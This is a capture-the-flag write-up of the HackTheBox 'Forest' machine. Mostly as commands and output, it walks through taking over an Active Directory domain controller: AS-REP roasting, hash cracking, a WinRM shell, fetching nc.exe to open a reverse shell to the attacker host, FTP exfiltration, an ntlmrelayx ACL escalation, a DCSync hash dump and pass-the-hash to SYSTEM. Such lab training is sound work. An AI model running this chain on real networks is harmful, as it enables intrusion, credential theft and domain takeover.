As usual, first an nmap scan
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 secondsThere are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!
First let’s try enum4linux to see if I can list some more information.
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001eAfter trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with hashcat.
[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
---snip---
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> pommiey4632@hotmail.com
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16So apparently Alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include correct username, password and IP address
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'http://10.10.10.161:5985/wsman',
user: 'svc-alfresco',
password: 's3rvice',
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
endand run it to get shell access.
root@kalivm:~/Forest# ruby shell.rb
PS > whoami
htb\svc-alfrescoAll you have to do is get the user hash and start escalating privileges
PS > type ..\Desktop\user.txt
e5e4*****d9edPrivilege Escalation
The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.
root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe
PS > ./nc 10.10.15.64 9002 -e powershell.exeroot@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Documents\sedje>PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir
Directory: C:\Users\svc-alfresco\Documents\sedje
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2019 5:20 AM 12950 20191025120253_BloodHound.zip
-a---- 10/25/2019 5:20 AM 9151 Rk9SRVNU.bin
-a---- 10/25/2019 5:18 AM 751616 SharpHound.exe
-a---- 10/25/2019 5:17 AM 886595 SharpHound.ps1After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.
PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)):
put 20191025120253_BloodHound.zip
quitOf course, this approach requires an active FTP server on my attacker, which can be easily done with Python
root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.
In the “bloodhound overview” of the shortest path to domain manager, I see that a user who is part of the ‘Exchange Windows permissions’ group has the ability to write the ACL of the entire HTB.Local domain, for example the Password hashes. I can also see that the svc-alfresco user has GenericAll permissions for that particular group through their delegated memberships of `Service Accounts`,` Privileged IT Accounts` and `Account Operators`.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $CredWhen you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!
root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connectionsNow all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.
I open a browser for localhost and provide the sedje credentials.
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedssAnd ntlmrelayx.py already tells me what to do, sedje now has proper permissions to continue secretsdump.py.
root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---Use secretsdump.py to get all the hashes in the domain
root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\systemPS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129ccAuthor: Puckiestyle